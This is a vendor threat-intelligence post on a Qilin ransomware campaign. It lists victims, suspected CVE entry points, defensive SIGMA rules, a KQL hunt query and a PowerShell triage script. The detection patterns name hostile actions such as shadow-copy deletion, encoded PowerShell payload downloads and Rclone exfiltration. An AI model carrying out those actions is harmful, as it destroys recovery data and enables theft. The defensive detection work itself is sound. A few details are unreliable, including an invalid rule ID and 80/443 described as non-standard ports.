Back to Intelligence

QILIN Ransomware: 15+ Victims in 48-Hour Blitz — US Healthcare & Manufacturing Under Siege

SA
Security Arsenal Team
May 30, 2026
7 min read

Aliases: Agenda, Twisted Spider, Qilin.B

Operational Model: Ransomware-as-a-Service (RaaS). Qilin operates with an aggressive affiliate model, recently shifting their encryptor to the Rust programming language for cross-platform compatibility and increased difficulty in reverse engineering.

Ransom Demands: Highly variable, typically ranging from $500,000 to $5 million USD. Demands are calibrated based on victim revenue and the sensitivity of exfiltrated data.

Initial Access Vectors:

  • Exploited Vulnerabilities: Heavy reliance on exploiting internet-facing applications (e.g., ConnectWise ScreenConnect, Microsoft Exchange, VPN appliances).
  • Phishing: Credential harvesting campaigns leading to initial foothold.
  • Valid Credentials: Brute-forcing RDP and VPN endpoints exposed to the public web.

Tactics: Utilizes a double-extortion model. Qilin affiliates are known to exfiltrate large volumes of data prior to encryption, often using tools like Rclone or Mega for data transfer. They leverage Cobalt Strike beacons for lateral movement and "Living off the Land" binaries (LOLBins) to evade detection.

Dwell Time: Short. Recent intelligence indicates a dwell time of 3–7 days between initial access and detonation, suggesting a "smash-and-grab" philosophy.

Current Campaign Analysis

Campaign Timeline: May 27–28, 2026

Sectors Targeted: Qilin has demonstrated a distinct pivot towards critical services and mid-market supply chain entities in this wave:

  • Healthcare (30%): Mindpath College Health, Providence Medical Group, Dillon Family Medicine.
  • Manufacturing (20%): Sinomax USA, Carton Craft Supply, LA Woodworks.
  • Business Services (20%): Gallun Snow Associates, Kennedy, McLaughlin & Associates, Mainstreet Organization of REALTORS.
  • Education: Alamo Heights School District.

Geographic Concentration: The United States is the primary target zone, accounting for over 70% of the recent postings (US, AU, DK, LA, SA, HU, GB). This suggests affiliates are specifically targeting Western economies with higher ransom-paying capabilities.

Victim Profile: The victim list indicates a focus on Small-to-Medium Businesses (SMBs) and regional entities. These organizations often lack the dedicated 24/7 SOC coverage required to detect the rapid lateral movement Qilin employs before detonation.

Escalation Patterns: Qilin published approximately 15 victims within a 48-hour window (May 27–28). This high velocity suggests a successful automated exploitation tool or a specific exploit (likely related to the CVEs below) is being used to seed multiple victims simultaneously.

Connection to CVEs (Initial Access Vectors): Based on the sectors hit (Healthcare, Business Services), we assess with high confidence that Qilin affiliates are leveraging the following CISA Known Exploited Vulnerabilities (KEV) for initial access:

  • CVE-2024-1708 (ConnectWise ScreenConnect): Highly probable vector for the Business Services victims. ScreenConnect is ubiquitous in MSP environments managing the IT infrastructure of the targeted small businesses.
  • CVE-2023-21529 (Microsoft Exchange): A probable vector for Healthcare and Education victims, which frequently rely on on-premise Exchange servers.
  • CVE-2026-20131 (Cisco Secure Firewall): A critical perimeter bypass vector allowing access to internal networks regardless of VPN patch status.
  • CVE-2026-48027 (Nx Console): A software supply chain vulnerability likely used in technology/manufacturing sectors utilizing specific development consoles.

Detection Engineering

SIGMA Rules

YAML
---
title: Potential ScreenConnect Auth Bypass / Path Traversal
id: c1c8b4d0-5e6f-4a2b-9e1c-8d9f0a1b2c3d
description: Detects potential exploitation of ConnectWise ScreenConnect path traversal (CVE-2024-1708) and authentication bypass observed in recent Qilin campaigns.
status: experimental
date: 2026/05/30
author: Security Arsenal Research
references:
    - https://www.cisa.gov/known-exploited-vulnerabilities-catalog
logsource:
    category: web
detection:
    selection:
        cs-uri-query|contains:
            - '/App_Extensions/'
            - 'Bin/'
            - '.aspx'
        cs-method: 'POST'
    condition: selection
falsepositives:
    - Legitimate administrative access via ScreenConnect
level: high
tags:
    - attack.initial_access
    - attack.t1190
    - cve-2024-1708
    - qilin

---
title: Suspicious PowerShell Encoded Command Payload
description: Detects base64 encoded PowerShell command lines often used by Qilin affiliates to download payloads or execute lateral movement scripts.
id: a2b3c4d5-e6f7-8a9b-0c1d-2e3f4a5b6c7d
status: experimental
date: 2026/05/30
author: Security Arsenal Research
logsource:
    product: windows
    category: process_creation
detection:
    selection:
        Image|endswith:
            - '\powershell.exe'
            - '\pwsh.exe'
        CommandLine|contains:
            - ' -Enc '
            - ' -EncodedCommand '
    filter_legit:
        CommandLine|contains:
            - 'ManagementAgent'
            - 'Update-Help'
    condition: selection and not filter_legit
falsepositives:
    - System management scripts
level: high
tags:
    - attack.execution
    - attack.t1059.001
    - qilin

---
title: Ransomware Pre-Encryption Shadow Copy Deletion
description: Detects attempts to delete volume shadow copies using vssadmin or diskshadow, a key TTP for Qilin prior to encryption to prevent recovery.
id: d4e5f6g7-h8i9-0j1k-2l3m-4n5o6p7q8r9s
status: experimental
date: 2026/05/30
author: Security Arsenal Research
logsource:
    product: windows
    category: process_creation
detection:
    selection_vssadmin:
        Image|endswith: '\vssadmin.exe'
        CommandLine|contains: 'delete shadows'
    selection_diskshadow:
        Image|endswith: '\diskshadow.exe'
        CommandLine|contains:
            - 'delete shadows'
            - 'reset'
    condition: 1 of selection*
falsepositives:
    - Legitimate system administration (rare)
level: critical
tags:
    - attack.impact
    - attack.t1490
    - qilin

KQL (Microsoft Sentinel)

KQL — Microsoft Sentinel / Defender
// Hunt for lateral movement and data staging indicators associated with Qilin
// Focuses on RDP usage, PsExec/WMI execution, and high-volume file access
let TimeFrame = 1d;
DeviceProcessEvents
| where Timestamp >= ago(TimeFrame)
| where (
    // Common lateral movement tools
    FileName in~ ('psexec.exe', 'psexec64.exe', 'wmic.exe', 'wmi.exe', 'powershell.exe') or
    // SMB lateral movement indicators
    ProcessCommandLine contains '\\' and (ProcessCommandLine contains 'copy ' or ProcessCommandLine contains 'move ') or
    // RDP activation
    FileName =~ 'mstsc.exe'
)
| summarize Count = count(), ArgSet = make_set(ProcessCommandLine) by DeviceName, FileName, AccountName
| where Count > 5 // Filter noise
| order by Count desc

PowerShell Response Script

PowerShell
<#
.SYNOPSIS
    Qilin Ransomware Rapid Response Check
.DESCRIPTION
    Checks for recent scheduled tasks (persistence), 
    Volume Shadow Copy manipulation (recovery denial), and unusual RDP sessions.
#>

Write-Host "[+] Starting Qilin TTP Hunt..." -ForegroundColor Cyan

# 1. Check for Scheduled Tasks created in the last 7 days (Persistence)
Write-Host "[1] Checking for recently created Scheduled Tasks (Last 7 Days)..." -ForegroundColor Yellow
$schTasks = Get-ScheduledTask | Where-Object { $_.Date -gt (Get-Date).AddDays(-7) }
if ($schTasks) {
    Write-Host "ALERT: Found recently created scheduled tasks:" -ForegroundColor Red
    $schTasks | Select-Object TaskName, Date, Author, TaskPath | Format-Table -AutoSize
} else {
    Write-Host "No suspicious recent tasks found." -ForegroundColor Green
}

# 2. Check Volume Shadow Copy Status (Recovery Check)
Write-Host "[2] Checking Volume Shadow Copy Storage Health..." -ForegroundColor Yellow
try {
    $vss = vssadmin list shadows | Select-String "Shadow Copy Volume"
    if ($null -eq $vss) {
        Write-Host "CRITICAL: NO Shadow Copies found. They may have been deleted." -ForegroundColor Red
    } else {
        Write-Host "Shadow Copies present ($($vss.Count) instances)." -ForegroundColor Green
    }
} catch {
    Write-Host "Error checking VSS." -ForegroundColor Gray
}

# 3. Check for active RDP sessions (Lateral Movement)
Write-Host "[3] Enumerating Active RDP Sessions..." -ForegroundColor Yellow
$query = "query user"
$sessions = query user
if ($sessions) {
    Write-Host "Active Sessions Found:" -ForegroundColor Yellow
    $sessions
} else {
    Write-Host "No active RDP sessions." -ForegroundColor Green
}

Write-Host "[+] Hunt Complete." -ForegroundColor Cyan


---

Incident Response Priorities

T-Minus Detection Checklist (Pre-Encryption):

  1. Web Shell & IIS Logs: Hunt for anomalies in access.log specific to \\App_Extensions or Bin paths (ScreenConnect IoC).
  2. Service Executions: Monitor services.exe spawning cmd.exe or powershell.exe—a classic sign of web shell exploitation.
  3. Large Outbound Transfers: Detect sudden spikes in egress traffic to non-standard ports (e.g., 80/443) or file sharing sites (Mega, Dropbox) using Rclone or Winscp.

Critical Assets Prioritized for Exfiltration:

  • Healthcare: Patient Health Information (PHI/EMR databases), insurance claim data.
  • Manufacturing: CAD drawings, proprietary formulas, client supply chain lists.
  • Business Services: Financial records (tax docs), client databases, legal contracts.

Containment Actions:

  1. Immediate Isolation: Disconnect compromised segments from the core network; do not reboot systems yet (volatile memory evidence).
  2. Block CVE Vectors: Immediately block inbound traffic to known vulnerable paths (e.g., /Host/* on ScreenConnect servers) and patch CVE-2024-1708.
  3. Suspend Accounts: Suspend service accounts associated with the exploited applications (e.g., IIS service accounts, SQL service accounts).

Hardening Recommendations

Immediate (24h):

  • Patch CVE-2024-1708: If running ConnectWise ScreenConnect, upgrade to the latest patched version immediately or disable external access until patched.
  • Disable RDP: Disable internet-facing RDP. Require VPN (with MFA) for all remote administrative access.
  • Block Macros: Enforce policies to disable Office macros on documents originating from the internet.

Short-term (2 weeks):

  • Network Segmentation: Isolate critical backup systems from the production network. Qilin frequently targets backup agents to prevent recovery.
  • Implement MFA Everywhere: Specifically enforce phishing-resistant MFA (FIDO2) for VPNs, webmail, and remote management tools.
  • EDR Tuning: Ensure EDR solutions are monitoring for vssadmin deletion processes and PowerShell encoded command execution.

Related Resources

Security Arsenal Incident Response Managed SOC & MDR Services AlertMonitor Threat Detection From The Dark Side Intel Hub

darkwebransomware-gangqilinransomwarehealthcaremanufacturingcve-2024-1708initial-access

Is your security operations ready?

Get a free SOC assessment or see how AlertMonitor cuts through alert noise with automated triage.

Book a SOC AssessmentSee AlertMonitor in Action